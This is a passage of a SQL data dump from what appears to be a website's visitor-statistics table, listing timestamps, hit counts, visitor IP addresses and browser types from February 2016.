91.63','other'),(1657,1455117909,2,0,2,0,'66.249.69.3',''),(1658,1455117958,1,1,0,0,'176.241.109.94','firefox'),(1659,1455118008,1,1,0,0,'178.95.255.26','firefox'),(1660,1455118054,1,1,0,0,'130.0.235.182','other'),(1661,1455118077,1,0,1,0,'66.249.69.110',''),(1662,1455118079,1,1,0,0,'141.8.142.1','other'),(1663,1455118097,1,1,0,0,'178.154.189.204','other'),(1664,1455118475,1,1,0,0,'141.8.184.18','other'),(1665,1455118476,1,1,0,0,'93.158.152.44','other'),(1666,1455118478,1,1,0,0,'130.193.51.29','other'),(1668,1455118497,1,0,1,0,'66.249.69.11',''),(1669,1455119380,1,1,0,0,'40.77.167.38','other'),(1670,1455119457,1,0,1,0,'66.249.69.11',''),(1671,1455120360,1,1,0,0,'213.174.7.21','firefox'),(1672,1455120567,1,1,0,0,'95.25.4.136','msie'),(1673,1455120645,1,1,0,0,'37.53.89.22','chrome'),(1674,1455120650,1,0,1,0,'66.249.69.11',''),(1675,1455121216,4,0,4,0,'66.249.69.124',''),(1676,1455121270,1,1,0,0,'5.255.253.24','other'),(1677,1455121275,3,0,3,0,'66.249.69.3',''),(1678,1455122013,1,0,1,0,'66.249.69.11',''),(1679,1455122121,1,1,0,0,'62.210.215.100','chrome'),(1681,1455122735,1,0,1,0,'66.249.69.3',''),(1682,1455122877,1,0,1,0,'66.249.69.94',''),(1683,1455123415,1,1,0,0,'141.8.184.18','other'),(1684,1455123417,1,1,0,0,'217.69.136.206','other'),(1685,1455123681,3,0,3,0,'66.249.69.11',''),(1686,1455123770,1,0,1,0,'66.249.69.3',''),(1687,1455123834,1,1,0,0,'180.76.15.149','other'),(1688,1455123881,1,1,0,0,'207.46.13.93','other'),(1689,1455124292,1,1,0,0,'162.247.72.199','msie'),(1690,1455124399,1,1,0,0,'40.77.167.23','other'),(1691,1455124505,1,1,0,0,'207.46.13.121','other'),(1692,1455124646,2,2,0,0,'94.23.98.252','firefox'),(1693,1455124651,2,2,0,0,'94.23.98.252','other'),(1694,1455124845,1,0,1,0,'68.180.229.232',''),(1695,1455124936,1,1,0,0,'8.29.198.25','other'),(1696,1455125392,1,0,1,0,'66.249.69.11',''),(1697,1455125639,2,2,0,0,'213.174.7.16','chrome'),(1698,1455126227,1,0,1,0,'66.249.69.124',''),(1699,1455126659,3,0,3,0,'66.249.69.11',''),(1700,1455126785,1,1,0,0,'207.46.13.121','other'),(1701,1455127023,1,1,0,0,'213.174.7.19','chrome'),(1702,1455127507,5,5,0,0,'178.154.189.17','other'),(1703,1455127533,3,3,0,0,'5.255.253.99','other'),(1704,1455127545,3,3,0,0,'5.255.253.95','other'),(1705,1455127550,4,4,0,0,'141.8.184.18','other'),(1706,1455127681,1,1,0,0,'40.77.167.20','other'),(1707,1455127832,1,1,0,0,'194.44.93.7','firefox'),(1708,1455128137,2,0,2,0,'68.180.229.232',''),(1709,1455128551,1,1,0,0,'66.249.91.8','other'),(1710,1455128812,1,1,0,0,'66.249.81.208','firefox'),(1711,1455129169,1,1,0,0,'176.119.75.254','chrome'),(1712,1455129370,1,0,1,0,'68.180.229.232',''),(1713,1455129594,1,0,1,0,'66.249.75.93',''),(1714,1455129949,1,1,0,0,'93.80.237.230','msie'),(1715,1455130070,2,0,2,0,'66.249.69.11',''),(1716,1455130303,1,1,0,0,'37.204.97.54','msie'),(1717,1455130370,2,2,0,0,'178.154.189.17','other'),(1718,1455130420,2,0,2,0,'66.249.69.3',''),(1719,1455130646,7,0,7,0,'66.249.69.124',''),(1720,1455130803,1,0,1,0,'68.180.229.232',''),(1721,1455130821,1,1,0,0,'207.46.13.161','other'),(1722,1455130919,1,0,1,0,'66.249.75.85',''),(1723,1455131009,1,0,1,0,'66.249.69.11',''),(1724,1455131928,2,0,2,0,'66.249.69.3',''),(1725,1455132136,1,1,0,0,'188.239.21.206','chrome'),(1726,1455132697,1,0,1,0,'68.180.229.232',''),(1727,1455132856,1,1,0,0,'130.193.51.26','other'),(1728,1455133113,1,1,0,0,'5.255.253.82','other'),(1729,1455133514,1,0,1,0,'66.249.69.3',''),(1730,1455133812,1,1,0,0,'130.193.51.66','other'),(1731,1455134346,1,1,0,0,'40.77.167.20','other'),(1732,1455134598,1,0,1,0,'68.180.229.232',''),(1734,1455134615,2,2,0,0,'178.154.189.204','other'),(1735,1455134769,1,1,0,0,'5.255.253.103','other'),(1736,1455134773,1,1,0,0,'141.8.142.50','other'),(1737,1455134781,1,1,0,0,'130.193.51.26','other'),(1738,1455134794,1,1,0,0,'93.158.152.53','other'),(1739,1455134798,1,1,0,0,'93.158.152.5','other'),(1740,1455134880,1,0,1,0,'66.249.69.11',''),(1741,1455135097,1,1,0,0,'37.9.122.203','other'),(1742,1455135145,1,1,0,0,'188.32.209.242','msie'),(1743,1455135745,1,0,1,0,'66.249.69.124',''),(1744,1455135775,1,1,0,0,'8.29.198.25','other'),(1745,1455135790,168,168,0,0,'94.154.233.132','other'),(1746,1455135966,1,1,0,0,'93.158.152.5','other'),(1747,1455135970,1,1,0,0,'141.8.132.10','other'),(1748,1455136477,1,1,0,0,'5.255.253.95','other'),(1749,1455136719,1,0,1,0,'66.249.69.124',''),(1750,1455136743,1,1,0,0,'141.8.142.76','other'),(1751,1455137364,1,1,0,0,'213.174.7.30','chrome'),(1752,1455137378,1,1,0,0,'82.207.38.149','chrome'),(1753,1455137742,1,1,0,0,'54.161.207.93','firefox'),(1754,1455138378,1,1,0,0,'130.193.50.38','other'),(1755,1455138935,2,2,0,0,'100.43.81.149','other'),(1756,1455138958,1,1,0,0,'141.8.132.10','other'),(1757,1455138962,1,1,0,0,'141.8.142.35','other'),(1758,1455138966,1,1,0,0,'93.158.152.8','other'),(1759,1455138971,1,1,0,0,'93.158.152.46','other'),(1760,1455139010,1,1,0,0,'66.249.91.8','other'),(1761,1455139021,1,1,0,0,'109.87.138.56','other'),(1762,1455139220,1,1,0,0,'180.76.15.33','other'),(1763,1455139624,2,2,0,0,'82.193.127.15','other'),(1764,1455140311,1,1,0,0,'141.8.132.10','other'),(1765,1455140316,1,1,0,0,'141.8.132.45','other'),(1766,1455140319,2,2,0,0,'141.8.142.35','other'),(1767,1455140324,1,1,0,0,'130.193.50.7','other'),(1768,1455140327,2,2,0,0,'93.158.152.46','other'),(1769,1455140333,2,2,0,0,'141.8.132.71','other'),(1770,1455140336,1,1,0,0,'141.8.132.34','other'),(1771,1455140341,1,1,0,0,'5.255.253.24','other'),(1772,1455140344,2,2,0,0,'141.8.132.52','other'),(1773,1455140357,1,1,0,0,'93.158.152.14','other'),(1774,1455140361,1,1,0,0,'141.8.142.76','other'),(1775,1455140365,1,1,0,0,'141.8.184.18','other'),(1776,1455140370,1,1,0,0,'5.255.253.95','other'),(1777,1455140374,1,1,0,0,'178.154.189.17','other'),(1778,1455140379,1,1,0,0,'5.255.253.99','other'),(1779,1455140382,1,1,0,0,'5.255.253.124','other'),(1780,1455140391,1,1,0,0,'93.158.152.8','other'),(1781,1455140392,1,0,1,0,'66.249.69.124',''),(1782,1455140399,1,1,0,0,'178.154.189.26','other'),(1783,1455140576,1,1,0,0,'130.193.51.29','other'),(1784,1455140588,1,1,0,0,'130.193.51.26','other'),(1785,1455140879,1,0,1,0,'66.249.69.11',''),(1786,1455140943,3,3,0,0,'69.30.215.26','other'),(1787,1455141039,1,1,0,0,'207.46.13.121','other'),(1788,1455141143,7,7,0,0,'80.91.162.99','other'),(1789,1455141282,1,1,0,0,'207.46.13.49','other'),(1790,1455141376,1,1,0,0,'178.255.215.95','other'),(1791,1455141587,3,3,0,0,'82.193.127.15','other'),(1792,1455142035,2,0,2,0,'66.249.69.124',''),(1793,1455142358,1,1,0,0,'54.234.38.8','other'),(1794,1455142654,1,0,1,0,'66.249.69.11',''),(1795,1455142665,1,0,1,0,'66.249.69.3',''),(1796,1455143176,1,1,0,0,'207.46.13.49','other'),(1797,1455143301,1,1,0,0,'141.8.132.10','other'),(1798,1455143304,1,1,0,0,'130.193.37.18','other'),(1799,1455143308,1,1,0,0,'141.8.184.29','other'),(1800,1455143567,1,0,1,0,'66.249.69.11',''),(1801,1455144473,1,1,0,0,'91.200.12.143','firefox'),(1802,1455144490,2,0,2,0,'66.249.69.11',''),(1803,1455144552,1,0,1,0,'66.249.69.102',''),(1804,1455144826,2,2,0,0,'130.193.50.7','other'),(1805,1455144830,1,1,0,0,'178.154.189.26','other'),(1806,1455144834,1,1,0,0,'5.255.253.24','other'),(1807,1455144862,1,1,0,0,'5.255.253.124','other'),(1808,1455144866,1,1,0,0,'5.255.253.103','other'),(1809,1455144871,1,1,0,0,'93.158.152.5','other'),(1810,1455144876,1,1,0,0,'141.8.132.71','other'),(1811,1455144883,1,1,0,0,'5.255.253.95','other'),(1812,1455144888,1,1,0,0,'141.8.132.10','other'),(1813,1455144892,1,1,0,0,'141.8.142.35','other'),(1814,1455144896,1,1,0,0,'93.158.152.8','other'),(1815,1455144961,7,7,0,0,'80.91.162.99','other'),(1816,1455145389,1,1,0,0,'91.200.12.143','chrome'),(1817,1455145692,1,1,0,0,'51.255.207.29','other'),(1818,1455145705,7,0,7,0,'68.180.229.232',''),(1819,1455145870,1,0,1,0,'66.249.69.3',''),(1820,1455145955,1,1,0,0,'141.138.109.3','chrome'),(1821,1455146231,1,0,1,0,'66.249.69.11',''),(1822,1455146588,1,1,0,0,'8.29.198.25','other'),(1823,1455146686,1,0,1,0,'68.180.229.232',''),(1824,1455146986,1,0,1,0,'66.249.69.124',''),(1825,1455147024,1,1,0,0,'130.193.51.78','other'),(1826,1455147035,1,1,0,0,'130.193.50.4','other'),(1827,1455147096,1,1,0,0,'207.46.13.49','other'),(1828,1455147370,1,1,0,0,'141.8.184.18','other'),(1829,1455147380,1,1,0,0,'141.8.132.45','other'),(1830,1455147384,1,1,0,0,'5.255.253.95','other'),(1831,1455147391,1,0,1,0,'66.249.69.3',''),(1832,1455147392,1,1,0,0,'141.8.132.10','other'),(1833,1455147397,1,1,0,0,'141.8.142.35','other'),(1834,1455148277,1,1,0,0,'40.77.167.20','other'),(1835,1455148700,2,0,2,0,'66.249.69.124',''),(1836,1455148905,4,4,0,0,'82.193.127.15','other'),(1837,1455148916,1,1,0,0,'62.210.215.100','chrome'),(1838,1455149187,1,0,1,0,'66.249.69.3',''),(1839,1455149927,1,0,1,0,'66.249.69.94',''),(1840,1455150011,1,1,0,0,'66.249.91.63','other'),(1841,1455150045,1,1,0,0,'207.46.13.49','other'),(1842,1455150379,1,1,0,0,'141.8.184.18','other'),(1843,1455150457,1,1,0,0,'5.255.253.95','other'),(1844,1455150473,2,2,0,0,'91.209.51.22','other'),(1845,1455150739,1,0,1,0,'66.249.69.124',''),(1846,1455151409,1,0,1,0,'66.249.69.102',''),(1847,1455151797,1,1,0,0,'207.46.13.168','other'),(1848,1455153026,1,1,0,0,'130.193.51.59','other'),(1849,1455153030,1,1,0,0,'5.255.253.124','other'),(1850,1455153146,1,0,1,0,'66.249.69.110',''),(1851,1455153652,1,1,0,0,'207.46.13.121','other'),(1852,1455153884,2,0,2,0,'66.249.69.11',''),(1853,1455154196,2,2,0,0,'177.75.16.71','other'),(1854,1455154258,4,4,0,0,'91.121.101.78','other'),(1855,1455154276,2,0,2,0,'68.180.229.232',''),(1856,1455154461,3,3,0,0,'82.193.127.15','other'),(1857,1455154756,2,2,0,0,'5.9.89.170','other'),(1858,1455155752,1,1,0,0,'141.8.132.34','other'),(1859,1455155757,1,1,0,0,'5.255.253.103','other'),(1860,1455156035,1,1,0,0,'130.193.51.26','other'),(1861,1455156460,1,1,0,0,'37.9.122.203','other'),(1862,1455156493,1,1,0,0,'180.76.15.145','other'),(1863,1455156609,3,0,3,0,'68.180.229.232',''),(1864,1455157357,1,1,0,0,'130.193.51.29','other'),(1865,1455157365,1,1,0,0,'130.193.51.26','other'),(1866,1455157369,1,1,0,0,'93.158.152.5','other'),(1867,1455157373,1,1,0,0,'93.158.152.14','other'),(1868,1455157377,1,1,0,0,'93.158.152.8','other'),(1869,1455157381,1,1,0,0,'141.8.142.50','other'),(1870,1455157384,1,1,0,0,'130.193.37.18','other'),(1871,1455157388,1,1,0,0,'5.255.253.80','other'),(1872,1455157392,1,1,0,0,'141.8.184.29','other'),(1873,1455157396,1,1,0,0,'141.8.132.52','other'),(1875,1455157781,1,1,0,0,'207.46.13.49','other'),(1876,1455157828,1,1,0,0,'65.19.138.33','other'),(1877,1455158022,1,1,0,0,'207.46.13.121','other'),(1878,1455158492,2,0,2,0,'68.180.229.232',''),(1879,1455158592,1,1,0,0,'207.46.13.168','other'),(1880,1455158827,1,1,0,0,'93.158.152.53','other'),(1881,1455159047,1,1,0,0,'93.158.152.5','other'),(1882,1455159051,1,1,0,0,'141.8.142.35','other'),(1883,1455159054,1,1,0,0,'141.8.183.1','other'),(1884,1455159058,1,1,0,0,'141.8.142.76','other'),(1885,1455159062,1,1,0,0,'141.8.142.50','other'),(1886,1455159236,1,1,0,0,'207.46.13.121','other'),(1887,1455159475,1,0,1,0,'68.180.229.232',''),(1888,1455159644,1,1,0,0,'141.8.184.18','other'),(1889,1455159647,1,1,0,0,'178.154.189.17','other'),(1890,1455160138,1,1,0,0,'37.9.122.201','other'),(1891,1455160780,1,1,0,0,'66.249.91.63','other'),(1892,1455161245,1,1,0,0,'141.8.184.18','other'),(1893,1455161248,1,1,0,0,'5.255.253.95','other'),(1894,1455161252,1,1,0,0,'178.154.189.17','other'),(1895,1455161568,1,1,0,0,'46.119.114.88','chrome'),(1896,1455161666,1,0,1,0,'66.249.69.3',''),(1897,1455162967,1,0,1,0,'66.249.69.124',''),(1898,1455163597,1,0,1,0,'68.180.229.232',''),(1899,1455163859,1,1,0,0,'207.46.13.161','other'),(1900,1455163908,1,1,0,0,'141.8.183.22','other'),(1901,1455163912,2,2,0,0,'141.8.132.45','other'),(1902,1455163915,1,1,0,0,'141.8.184.19','other'),(1903,1455163919,1,1,0,0,'141.8.132.10','other'),(1904,1455163922,1,1,0,0,'5.255.253.23','other'),(1905,1455164284,1,1,0,0,'207.46.13.81','other'),(1906,1455164872,2,0,2,0,'66.249.69.11',''),(1907,1455165140,1,1,0,0,'178.154.189.17','other'),(1908,1455165163,2,2,0,0,'141.8.183.23','other'),(1909,1455165166,1,1,0,0,'93.158.152.46','other'),(1910,1455165169,1,1,0,0,'93.158.152.75','other'),(1911,1455165188,1,1,0,0,'93.158.152.76','other'),(1912,1455165195,1,1,0,0,'130.193.51.38','other'),(1913,1455165725,1,0,1,0,'66.249.69.110',''),(1914,1455165866,1,0,1,0,'66.249.69.11',''),(1915,1455166027,1,1,0,0,'141.8.142.12','other'),(1916,1455166031,1,1,0,0,'141.8.142.40','other'),(1917,1455166034,2,2,0,0,'5.255.253.94','other'),(1918,1455166038,1,1,0,0,'141.8.184.19','other'),(1919,1455166049,1,1,0,0,'141.8.183.27','other'),(1921,1455166052,2,2,0,0,'5.255.253.95','other'),(1922,1455166077,1,1,0,0,'93.158.152.14','other'),(1923,1455166080,1,1,0,0,'93.158.152.64','other'),(1924,1455166084,1,1,0,0,'93.158.152.47','other'),(1925,1455166230,2,0,2,0,'68.180.229.232',''),(1926,1455166253,5,5,0,0,'141.8.184.18','other'),(1927,1455166901,1,0,1,0,'66.249.69.11',''),(1928,1455167157,1,1,0,0,'141.8.184.18','other'),(1929,1455167295,3,0,3,0,'68.180.229.232',''),(1930,1455168407,1,1,0,0,'66.102.9.104','firefox'),(1931,1455168412,2,0,2,0,'66.249.69.124',''),(1932,1455168468,2,0,2,0,'66.249.69.3',''),(1933,1455168641,1,1,0,0,'8.29.198.26','other'),(1934,1455168704,1,0,1,0,'66.249.69.110',''),(1935,1455168807,3,3,0,0,'5.255.253.99','other'),(1936,1455168823,8,8,0,0,'5.255.253.95','other'),(1937,1455168828,4,4,0,0,'178.154.189.17','other'),(1938,1455168869,4,4,0,0,'141.8.184.18','other'),(1939,1455169378,1,1,0,0,'180.76.15.149','other'),(1940,1455169782,1,1,0,0,'141.8.184.18','other'),(1941,1455169785,1,1,0,0,'5.255.253.95','other'),(1942,1455170179,1,1,0,0,'178.154.189.204','other'),(1943,1455170207,1,1,0,0,'207.46.13.161','other'),(1944,1455170223,3,0,3,0,'66.249.69.3',''),(1945,1455170425,1,0,1,0,'66.249.69.124',''),(1946,1455171016,1,0,1,0,'68.180.229.232',''),(1947,1455171120,1,1,0,0,'213.174.7.17','firefox'),(1948,1455171710,1,1,0,0,'66.249.91.4','other'),(1949,1455171747,1,1,0,0,'94.179.81.139','chrome'),(1950,1455171839,1,1,0,0,'93.158.152.53','other'),(1951,1455171848,1,1,0,0,'93.158.152.5','other'),(1952,1455172183,1,1,0,0,'212.111.198.100','chrome'),(1953,1455172282,1,0,1,0,'66.249.69.124',''),(1954,1455172439,1,0,1,0,'66.249.69.3',''),(1955,1455172722,2,2,0,0,'207.46.13.81','other'),(1956,1455173223,1,0,1,0,'68.180.229.232',''),(1957,1455173651,1,1,0,0,'78.111.190.75','msie'),(1958,1455174446,1,1,0,0,'78.111.186.86','chrome'),(1959,1455174994,1,1,0,0,'213.174.7.17','firefox'),(1960,1455175185,1,0,1,0,'66.249.69.11',''),(1961,1455175497,1,1,0,0,'213.174.7.16','firefox'),(1962,1455175811,1,1,0,0,'66.249.93.94','firefox'),(1963,1455176159,1,1,0,0,'213.174.7.18','chrome'),(1964,1455176705,1,0,1,0,'66.249.69.11',''),(1965,1455176976,2,2,0,0,'200.87.46.206','other'),(1966,1455176979,1,1,0,0,'200.87.46.206','firefox'),(1967,1455177454,1,1,0,0,'94.179.81.245','chrome'),(1968,1455177890,1,1,0,0,'178.93.16.175','chrome'),(1969,1455177997,1,0,1,0,'66.249.69.3',''),(1970,1455178424,1,0,1,0,'66.249.69.102',''),(1971,1455178540,1,1,0,0,'5.255.253.30','other'),(1972,1455178821,1,1,0,0,'213.174.7.18','chrome'),(1973,1455178857,2,2,0,0,'200.87.46.206','other'),(1974,1455178859,1,1,0,0,'200.87.46.206','firefox'),(1975,1455179173,1,1,0,0,'66.102.9.104','firefox'),(1976,1455179449,1,1,0,0,'8.29.198.26','other'),(1977,1455179715,1,1,0,0,'207.46.13.81','other'),(1978,1455180055,1,0,1,0,'68.180.229.232',''),(1979,1455180329,1,1,0,0,'180.76.15.26','other'),(1980,1455180396,1,1,0,0,'62.210.215.100','chrome'),(1981,1455180849,1,1,0,0,'78.111.190.242','firefox'),(1982,1455181557,1,1,0,0,'207.46.13.161','other'),(1983,1455181711,2,0,2,0,'66.249.69.11',''),(1984,1455181880,2,0,2,0,'68.180.229.232',''),(1985,1455181921,1,1,0,0,'94.179.78.108','firefox'),(1986,1455181942,2,2,0,0,'177.75.16.71','other'),(1987,1455182227,1,0,1,0,'66.249.69.124',''),(1988,1455182440,1,1,0,0,'66.249.91.63','other'),(1989,1455182755,1,0,1,0,'66.249.69.3',''),(1990,1455182784,2,0,2,0,'68.180.229.232',''),(1991,1455183169,1,1,0,0,'207.46.13.168','other'),(1992,1455183186,1,1,0,0,'93.158.152.47','other'),(1993,1455183189,1,1,0,0,'130.193.51.66','other'),(1994,1455183193,2,2,0,0,'130.193.51.38','other'),(1995,1455183197,1,1,0,0,'141.8.142.76','other'),(1996,1455183201,1,1,0,0,'93.158.152.58','other'),(1997,1455184212,1,0,1,0,'68.180.229.232',''),(1998,1455184261,1,1,0,0,'37.53.160.136','chrome'),(1999,1455184495,1,1,0,0,'46.200.238.228','chrome'),(2000,1455185187,1,1,0,0,'94.179.85.74','firefox'),(2001,1455185246,1,1,0,0,'40.77.167.69','other'),(2002,1455185684,1,1,0,0,'213.174.7.37','firefox'),(2003,1455186401,1,0,1,0,'66.249.69.94',''),(2004,1455186550,1,1,0,0,'94.179.37.64','chrome'),(2005,1455186738,1,0,1,0,'66.249.69.124',''),(2006,1455186749,1,0,1,0,'66.249.69.3',''),(2007,1455186959,1,1,0,0,'91.196.177.144','chrome'),(2008,1455187031,1,1,0,0,'141.8.132.101','other'),(2009,1455187040,1,1,0,0,'141.8.132.34','other'),(2010,1455187074,1,1,0,0,'5.255.253.86','other'),(2011,1455187078,1,1,0,0,'93.158.152.75','other'),(2012,1455187087,1,1,0,0,'141.8.142.12','other'),(2013,1455187113,1,1,0,0,'130.193.37.18','other'),(2014,1455187116,1,1,0,0,'130.193.51.59','other'),(2015,1455187148,2,2,0,0,'93.158.152.5','other'),(2016,1455187163,1,1,0,0,'5.255.253.30','other'),(2017,1455187188,1,1,0,0,'130.193.51.66','other'),(2018,1455187228,2,2,0,0,'141.8.132.45','other'),(2019,1455187289,1,1,0,0,'93.158.152.47','other'),(2020,1455187298,1,1,0,0,'130.193.51.38','other'),(2021,1455187303,1,1,0,0,'141.8.184.19','other'),(2022,1455187307,1,1,0,0,'5.255.253.94','other'),(2023,1455187311,1,1,0,0,'5.255.253.6','other'),(2024,1455187315,1,1,0,0,'130.193.50.7','other'),(2025,1455187320,1,1,0,0,'93.158.152.14','other'),(2026,1455187324,1,1,0,0,'5.255.253.121','other'),(2027,1455187365,1,1,0,0,'149.202.98.160','chrome'),(2028,1455187423,1,1,0,0,'213.174.7.54','chrome'),(2029,1455187529,1,1,0,0,'178.154.189.202','other'),(2030,1455187534,1,1,0,0,'178.154.189.204','other'),(2031,1455187540,1,1,0,0,'178.154.189.203','other'),(2032,1455188161,2,2,0,0,'141.8.142.35','other'),(2033,1455188201,1,1,0,0,'130.193.51.88','other'),(2034,1455188255,1,1,0,0,'130.193.37.18','other'),(2035,1455188275,1,1,0,0,'141.8.142.76','other'),(2036,1455188279,3,3,0,0,'93.158.152.14','other'),(2037,1455188292,2,2,0,0,'141.8.132.10','other'),(2038,1455188309,1,1,0,0,'207.46.13.161','other'),(2039,1455188344,1,1,0,0,'141.8.142.12','other'),(2040,1455188386,1,1,0,0,'91.196.178.16','firefox'),(2041,1455188458,1,1,0,0,'141.8.132.52','other'),(2042,1455188488,1,1,0,0,'91.196.177.144','chrome'),(2043,1455188692,1,1,0,0,'5.255.253.86','other'),(2044,1455188712,2,2,0,0,'141.8.132.27','other'),(2045,1455188881,1,1,0,0,'141.8.142.40','other'),(2046,1455188989,1,1,0,0,'5.255.253.82','other'),(2047,1455188991,1,1,0,0,'141.8.132.34','other'),(2048,1455189027,1,1,0,0,'207.46.13.49','other'),(2049,1455189123,1,0,1,0,'66.249.69.124',''),(2050,1455189192,2,2,0,0,'40.77.167.69','other'),(2051,1455189449,1,0,1,0,'66.249.69.3',''),(2052,1455189769,1,1,0,0,'93.126.74.44','other'),(2053,1455189788,2,0,2,0,'68.180.229.232',''),(2054,1455189989,1,1,0,0,'91.196.178.34','firefox'),(2055,1455190032,1,1,0,0,'213.174.7.17','firefox'),(2056,1455190046,1,1,0,0,'217.69.143.49','other'),(2057,1455190260,1,1,0,0,'8.29.198.26','other'),(2058,1455190378,1,1,0,0,'91.196.178.10','chrome'),(2059,1455190381,1,1,0,0,'130.193.37.18','other'),(2060,1455190957,1,1,0,0,'94.179.81.139','msie'),(2061,1455191352,1,1,0,0,'192.99.107.182','other'),(2062,1455191387,62,62,0,0,'136.243.152.18','other'),(2063,1455191899,1,1,0,0,'176.37.16.88','chrome'),(2064,1455192082,1,1,0,0,'141.8.184.18','other'),(2065,1455192553,1,0,1,0,'66.249.69.124',''),(2066,1455192666,1,1,0,0,'37.53.89.22','chrome'),(2067,1455192969,1,1,0,0,'93.126.74.44','other'),(2068,1455193119,1,1,0,0,'141.8.184.18','other'),(2069,1455193311,1,1,0,0,'66.249.91.4','other'),(2070,1455193508,1,1,0,0,'217.69.143.56','other'),(2071,1455193561,1,1,0,0,'46.201.227.188','opera'),(2072,1455193790,1,1,0,0,'37.55.89.166','chrome'),(2073,1455194023,1,1,0,0,'107.178.194.65','chrome'),(2074,1455194024,3,3,0,0,'107.178.194.69','chrome'),(2075,1455194565,1,1,0,0,'130.193.37.18','other'),(2076,1455194569,1,1,0,0,'217.69.136.208','other'),(2077,1455194946,1,1,0,0,'5.255.253.99','other'),(2078,1455194951,1,1,0,0,'141.8.184.18','other'),(2079,1455194956,1,1,0,0,'141.8.132.10','other'),(2080,1455194961,2,2,0,0,'178.154.189.17','other'),(2081,1455195018,1,1,0,0,'141.8.132.45','other'),(2082,1455195022,1,1,0,0,'141.8.142.35','other'),(2083,1455195605,1,1,0,0,'213.108.45.138','chrome'),(2084,1455195705,2,2,0,0,'82.193.127.15','other'),(2085,1455196099,1,1,0,0,'141.8.142.76','other'),(2086,1455196346,1,0,1,0,'66.249.69.110',''),(2087,1455196505,2,0,2,0,'66.249.69.3',''),(2088,1455196790,1,1,0,0,'91.196.178.12','chrome'),(2089,1455196942,1,1,0,0,'93.158.152.47','other'),(2090,1455197256,1,1,0,0,'37.52.17.33','chrome'),(2091,1455197335,1,0,1,0,'66.249.69.11',''),(2092,1455197552,1,1,0,0,'178.154.189.26','other'),(2093,1455197911,1,1,0,0,'217.69.143.55','other'),(2094,1455198335,1,1,0,0,'93.158.152.5','other'),(2095,1455198339,1,1,0,0,'93.158.152.8','other'),(2096,1455198492,1,1,0,0,'130.193.51.26','other'),(2097,1455198496,1,1,0,0,'5.255.253.99','other'),(2098,1455198500,1,1,0,0,'5.255.253.103','other'),(2099,1455198613,3,0,3,0,'68.180.229.232',''),(2100,1455198839,1,1,0,0,'91.196.179.33','firefox'),(2101,1455198916,1,1,0,0,'213.174.7.39','chrome'),(2102,1455198995,1,1,0,0,'92.113.174.248','chrome'),(2103,1455199375,4,4,0,0,'141.0.13.123','chrome'),(2104,1455199409,1,1,0,0,'130.193.51.59','other'),(2105,1455199732,1,0,1,0,'66.249.69.11',''),(2106,1455200073,1,1,0,0,'207.46.13.168','other'),(2107,1455200114,1,1,0,0,'141.8.132.52','other'),(2108,1455200227,1,1,0,0,'37.52.62.107','msie'),(2109,1455200351,2,0,2,0,'66.249.69.124',''),(2110,1455200640,8,8,0,0,'5.255.253.95','other'),(2111,1455200644,6,6,0,0,'178.154.189.17','other'),(2112,1455200647,5,5,0,0,'141.8.132.10','other'),(2113,1455200651,8,8,0,0,'141.8.132.45','other'),(2114,1455200657,5,5,0,0,'141.8.184.18','other'),(2115,1455200674,1,1,0,0,'93.158.152.8','other'),(2116,1455200682,6,6,0,0,'5.255.253.99','other'),(2117,1455200690,3,3,0,0,'141.8.142.35','other'),(2118,1455201074,1,1,0,0,'8.29.198.26','other'),(2119,1455201161,1,0,1,0,'66.249.69.11',''),(2120,1455201185,1,1,0,0,'92.113.174.248','chrome'),(2121,1455201385,2,0,2,0,'66.249.69.3',''),(2122,1455201515,1,1,0,0,'171.25.193.78','chrome'),(2123,1455201717,1,0,1,0,'68.180.229.232',''),(2124,1455202562,1,1,0,0,'178.92.209.176','chrome'),(2125,1455202700,3,3,0,0,'5.255.253.95','other'),(2126,1455202704,4,4,0,0,'141.8.184.18','other'),(2127,1455202717,1,1,0,0,'5.255.253.99','other'),(2128,1455202726,1,1,0,0,'141.8.132.10','other'),(2129,1455202734,1,1,0,0,'178.154.189.17','other'),(2130,1455203639,1,1,0,0,'62.210.215.100','chrome'),(2131,1455203773,2,0,2,0,'68.180.229.232',''),(2132,1455203928,2,0,2,0,'66.249.69.3',''),(2133,1455204155,1,0,1,0,'66.249.69.11',''),(2134,1455204202,1,0,1,0,'66.249.69.124',''),(2135,1455204339,1,1,0,0,'40.77.167.69','other'),(2136,1455204430,1,1,0,0,'66.249.91.4','other'),(2137,1455204948,1,1,0,0,'37.9.122.203','other'),(2138,1455205364,1,0,1,0,'66.249.69.3',''),(2139,1455205551,2,2,0,0,'141.8.184.18','other'),(2140,1455205562,4,4,0,0,'5.255.253.95','other'),(2141,1455205570,3,3,0,0,'141.8.132.10','other'),(2142,1455205587,1,1,0,0,'5.255.253.99','other'),(2143,1455205595,1,1,0,0,'178.154.189.17','other'),(2144,1455205968,1,0,1,0,'68.180.229.232',''),(2145,1455206079,1,1,0,0,'213.174.7.74','opera'),(2146,1455206402,1,0,1,0,'66.249.69.94',''),(2147,1455207006,1,0,1,0,'66.249.69.3',''),(2148,1455207137,1,1,0,0,'207.46.13.161','other'),(2149,1455207922,1,1,0,0,'178.94.180.45','chrome'),(2150,1455208006,1,1,0,0,'213.174.7.18','firefox'),(2151,1455208041,1,1,0,0,'207.46.13.161','other'),(2152,1455208626,2,0,2,0,'66.249.69.124',''),(2153,1455209255,3,0,3,0,'68.180.229.232',''),(2154,1455209328,1,1,0,0,'78.111.185.32','chrome'),(2155,1455209663,3,0,3,0,'66.249.69.124',''),(2156,1455210178,1,1,0,0,'180.76.15.144','other'),(2157,1455210492,2,0,2,0,'68.180.229.232',''),(2158,1455210615,2,2,0,0,'5.255.253.99','other'),(2159,1455210619,1,1,0,0,'141.8.132.45','other'),(2160,1455210623,1,1,0,0,'141.8.132.10','other'),(2161,1455210827,1,0,1,0,'66.249.69.94',''),(2162,1455211090,10,10,0,0,'77.248.252.113','other'),(2163,1455211460,1,1,0,0,'91.196.178.36','chrome'),(2164,1455211751,2,2,0,0,'207.46.13.168','other'),(2165,1455211896,1,1,0,0,'8.29.198.26','other'),(2166,1455212800,1,0,1,0,'66.249.69.11',''),(2167,1455212814,3,3,0,0,'141.8.184.18','other'),(2168,1455213054,1,1,0,0,'178.154.189.26','other'),(2169,1455213058,1,1,0,0,'141.8.183.1','other'),(2170,1455213062,1,1,0,0,'130.193.51.26','other'),(2171,1455213063,192,192,0,0,'82.193.127.15','other'),(2172,1455213320,1,1,0,0,'141.8.132.52','other'),(2173,1455213325,1,1,0,0,'141.8.132.45','other'),(2174,1455213420,1,1,0,0,'178.154.189.17','other'),(2175,1455213623,2,2,0,0,'177.75.16.71','other'),(2176,1455213891,1,1,0,0,'217.69.143.48','other'),(2177,1455213964,194,194,0,0,'82.193.